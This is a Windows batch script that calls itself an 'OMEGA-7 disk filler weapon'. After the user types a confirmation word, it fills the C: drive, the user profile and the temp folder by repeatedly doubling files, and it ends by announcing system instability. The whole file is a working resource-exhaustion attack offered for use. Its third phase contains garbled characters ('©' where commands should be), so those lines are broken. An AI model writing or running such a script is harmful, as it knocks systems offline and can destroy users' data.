@echo off
title OMEGA-7 // DISK FILLER PROTOCOL
color 0C
echo ========================================
echo    OMEGA-7 DISK FILLER WEAPON
echo    [RESOURCE EXHAUSTION ATTACK]
echo ========================================
echo.
echo [WARNING] This will consume all disk space.
echo [WARNING] Target VM will become unstable.
echo.
set /p confirm="Type 'FILL' to activate: "
if not "%confirm%"=="FILL" exit /b

echo [PHASE 1] Filling C:\ root directory...
echo. > C:\fill0.tmp 2>nul
:loop1
copy C:\fill0.tmp /b + C:\fill0.tmp /b C:\fill0.tmp /b >nul 2>&1
if %errorlevel%==0 goto loop1

echo [PHASE 2] Filling user directories...
echo. > "%USERPROFILE%\fill1.tmp" 2>nul
:loop2
copy "%USERPROFILE%\fill1.tmp" /b + "%USERPROFILE%\fill1.tmp" /b "%USERPROFILE%\fill1.tmp" /b >nul 2>&1
if %errorlevel%==0 goto loop2

echo [PHASE 3] Multi-threaded fill...
start /b "" cmd /c "echo. > C:\fill2.tmp & :loop3© C:\fill2.tmp /b + C:\fill2.tmp /b C:\fill2.tmp /b >nul && goto loop3"
start /b "" cmd /c "echo. > "%TEMP%\fill3.tmp" & :loop4© "%TEMP%\fill3.tmp" /b + "%TEMP%\fill3.tmp" /b "%TEMP%\fill3.tmp" /b >nul && goto loop4"

echo [MISSION COMPLETE] Disk exhaustion attack active.
echo System instability imminent.
pause